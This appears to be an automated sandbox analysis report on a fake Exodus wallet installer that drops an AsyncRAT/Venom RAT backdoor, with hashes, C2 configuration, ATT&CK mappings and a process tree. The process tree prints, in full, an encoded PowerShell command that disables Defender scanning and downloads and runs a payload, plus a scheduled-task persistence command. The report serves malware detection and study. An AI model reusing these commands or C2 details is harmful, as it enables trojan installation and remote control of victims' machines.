Analysis

  • max time kernel
    139s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    02-10-2022 15:57

General

  • Target

    exodus-windows-x64-22.9.8.exe

  • Size

    14.6MB

  • MD5

    ca131fbef972abf335bf3e6b1a35351f

  • SHA1

    e749e8fab09bdcf34c7ea51a71da789220407547

  • SHA256

    4644d5d8f56afb7b2095ca5c209e840ad3a7dddaa294fa6a074283f0f6b1d956

  • SHA512

    dc2b354acbeb29d06c9364b48cf13431b6a67fa4995c5667ec6d1511119763d67e92345a651a1649f072600cb42b858e84e78dc2b6b98370737a01b3cc81a1f7

  • SSDEEP

    196608:m74MrKY0OTIFVog4I/fh5s3D0cnuiJAzZlX+Zt1Z7tPRW30M:IprKY0OTeKR8h5s3wcnM1lX+ZDlrW

Score
10/10

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Exodus

C2

operador.ddns.me:4448

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    true

  • install_file

    Exodus.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Async RAT payload 11 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\exodus-windows-x64-22.9.8.exe
    "C:\Users\Admin\AppData\Local\Temp\exodus-windows-x64-22.9.8.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:896
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawB1AHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYQB1AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABpAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGUAeABvAGQAdQBzAGQAbwB3AG4AbABvAGEAZAAuAHMAMwAuAGEAbQBhAHoAbwBuAGEAdwBzAC4AYwBvAG0ALwBFAHgAbwBkAHUAcwAtAFcAaQBuAGQAbwB3AHMALgBlAHgAZQAnACwAIAA8ACMAZQBtAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHIAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHcAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBFAHgAbwBkAHUAcwAtAFcAaQBuAGQAbwB3AHMALgBlAHgAZQAnACkAKQA8ACMAdgBqAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AcwBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEUAeABvAGQAdQBzAC0AVwBpAG4AZABvAHcAcwAuAGUAeABlACcAKQA8ACMAaQBxAHgAIwA+AA=="
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1664
        • C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
          "C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1188
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Exodus" /tr '"C:\Users\Admin\AppData\Roaming\Exodus.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1928
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "Exodus" /tr '"C:\Users\Admin\AppData\Roaming\Exodus.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:1948
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpF42F.tmp.bat""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1748
            • C:\Windows\system32\timeout.exe
              timeout 3
              6⤵
              • Delays execution with timeout.exe
              PID:1600
            • C:\Users\Admin\AppData\Roaming\Exodus.exe
              "C:\Users\Admin\AppData\Roaming\Exodus.exe"
              6⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:764
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {269A4E2A-367B-4FD8-9D5F-5B81CD74FCCB} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Users\Admin\AppData\Local\Temp\exodus-windows-x64-22.9.8.exe
      C:\Users\Admin\AppData\Local\Temp\exodus-windows-x64-22.9.8.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:336
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdgBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawB1AHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAYQB1AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZABpAHYAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGUAeABvAGQAdQBzAGQAbwB3AG4AbABvAGEAZAAuAHMAMwAuAGEAbQBhAHoAbwBuAGEAdwBzAC4AYwBvAG0ALwBFAHgAbwBkAHUAcwAtAFcAaQBuAGQAbwB3AHMALgBlAHgAZQAnACwAIAA8ACMAZQBtAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHIAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHcAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBFAHgAbwBkAHUAcwAtAFcAaQBuAGQAbwB3AHMALgBlAHgAZQAnACkAKQA8ACMAdgBqAGcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AcwBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEUAeABvAGQAdQBzAC0AVwBpAG4AZABvAHcAcwAuAGUAeABlACcAKQA8ACMAaQBxAHgAIwA+AA=="
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
            "C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1820

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    60KB

    MD5

    d15aaa7c9be910a9898260767e2490e1

    SHA1

    2090c53f8d9fc3fbdbafd3a1e4dc25520eb74388

    SHA256

    f8ebaaf487cba0c81a17c8cd680bdd2dd8e90d2114ecc54844cffc0cc647848e

    SHA512

    7e1c1a683914b961b5cc2fe5e4ae288b60bab43bfaa21ce4972772aa0589615c19f57e672e1d93e50a7ed7b76fbd2f1b421089dcaed277120b93f8e91b18af94

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    206acb5e64ba119b8b9f5e7483c676e4

    SHA1

    bccf77bf49e6258d52ab227821059cb1b2ec775e

    SHA256

    1b37681a8bee4f933130ab4178a464158ef7d251a25e9207a10f986210bf9574

    SHA512

    ad670563ac2b3b72e992d2f7ade5bff12d9dfbc52ed1c0a288e730e5fcbb15f53291eaf57445ca341b033ff31fd9de268190d50c2160144e9cb2544c97d85336

  • C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • C:\Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • C:\Users\Admin\AppData\Local\Temp\exodus-windows-x64-22.9.8.exe
    Filesize

    14.6MB

    MD5

    ca131fbef972abf335bf3e6b1a35351f

    SHA1

    e749e8fab09bdcf34c7ea51a71da789220407547

    SHA256

    4644d5d8f56afb7b2095ca5c209e840ad3a7dddaa294fa6a074283f0f6b1d956

    SHA512

    dc2b354acbeb29d06c9364b48cf13431b6a67fa4995c5667ec6d1511119763d67e92345a651a1649f072600cb42b858e84e78dc2b6b98370737a01b3cc81a1f7

  • C:\Users\Admin\AppData\Local\Temp\tmpF42F.tmp.bat
    Filesize

    150B

    MD5

    9f1d179b2fe3932f0ef5501a6b306442

    SHA1

    a24672972b703efe12aa8ca43e2fd908c716cd21

    SHA256

    be05a9c778abe420a407dd8ed11df7d525fa3f7de7b9d91e46ed1b4b40482f6f

    SHA512

    6e56c44df5b02108791f25d0c4b695c70abb39b77b35a55e611d1cc8465640710940d11678af83b38546a6117d04161161b6034ef952d38ba365a8cb0115582b

  • C:\Users\Admin\AppData\Roaming\Exodus.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • C:\Users\Admin\AppData\Roaming\Exodus.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    b1f6d3bb0aafa3cc30695dc53f47a3be

    SHA1

    6157b5395dbe353a425f53bf3f81dabffd8ff49c

    SHA256

    51aeab15c6bf497c947acec9184461220a013f875863f2acadfcf716b416df93

    SHA512

    de7d4006e555b5379e19e33e80394023be77c8721f5749a8edcb6d3249367681f3909daecd0c80a8982c19574f460fb45b97ef3050d21521ca2177313521188f

  • \Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • \Users\Admin\AppData\Local\Temp\Exodus-Windows.exe
    Filesize

    63KB

    MD5

    c6edad994f3c41992614dbc4e87d92e4

    SHA1

    2418fd9580f534da9d7a730138e1534eb6b4fb79

    SHA256

    5ff8a321017bf90a5f6de2176e5a9f2811bde5f9ad2bc8d68accf24802ee5806

    SHA512

    f34b54504632f636ba26fccc14a8343f6cc5463b59b2f98b4ee4dd95147e9026db5aee911181e64273c6ee3a1c9f3f1e5c42d857e838d898992cbe006e977dab

  • memory/336-87-0x0000000000000000-mapping.dmp
  • memory/336-89-0x0000000000D20000-0x0000000001BCC000-memory.dmp
    Filesize

    14.7MB

  • memory/764-84-0x00000000013A0000-0x00000000013B6000-memory.dmp
    Filesize

    88KB

  • memory/764-81-0x0000000000000000-mapping.dmp
  • memory/884-96-0x0000000000401159-mapping.dmp
  • memory/896-66-0x0000000000400000-0x0000000000405000-memory.dmp
    Filesize

    20KB

  • memory/896-63-0x0000000000401159-mapping.dmp
  • memory/896-58-0x0000000000400000-0x0000000000405000-memory.dmp
    Filesize

    20KB

  • memory/896-59-0x0000000000400000-0x0000000000405000-memory.dmp
    Filesize

    20KB

  • memory/896-60-0x0000000000400000-0x0000000000405000-memory.dmp
    Filesize

    20KB

  • memory/896-61-0x0000000000400000-0x0000000000405000-memory.dmp
    Filesize

    20KB

  • memory/896-62-0x0000000000400000-0x0000000000405000-memory.dmp
    Filesize

    20KB

  • memory/1188-71-0x0000000000000000-mapping.dmp
  • memory/1188-75-0x0000000000CC0000-0x0000000000CD6000-memory.dmp
    Filesize

    88KB

  • memory/1600-80-0x0000000000000000-mapping.dmp
  • memory/1664-67-0x0000000000000000-mapping.dmp
  • memory/1664-74-0x0000000073830000-0x0000000073DDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1664-69-0x0000000073830000-0x0000000073DDB000-memory.dmp
    Filesize

    5.7MB

  • memory/1700-57-0x0000000000A80000-0x0000000000B1C000-memory.dmp
    Filesize

    624KB

  • memory/1700-54-0x0000000000D20000-0x0000000001BCC000-memory.dmp
    Filesize

    14.7MB

  • memory/1700-55-0x0000000007C60000-0x0000000007E26000-memory.dmp
    Filesize

    1.8MB

  • memory/1700-56-0x0000000074E41000-0x0000000074E43000-memory.dmp
    Filesize

    8KB

  • memory/1736-100-0x0000000000000000-mapping.dmp
  • memory/1736-103-0x0000000073800000-0x0000000073DAB000-memory.dmp
    Filesize

    5.7MB

  • memory/1736-109-0x0000000073800000-0x0000000073DAB000-memory.dmp
    Filesize

    5.7MB

  • memory/1748-77-0x0000000000000000-mapping.dmp
  • memory/1820-105-0x0000000000000000-mapping.dmp
  • memory/1820-108-0x0000000000B60000-0x0000000000B76000-memory.dmp
    Filesize

    88KB

  • memory/1928-76-0x0000000000000000-mapping.dmp
  • memory/1948-79-0x0000000000000000-mapping.dmp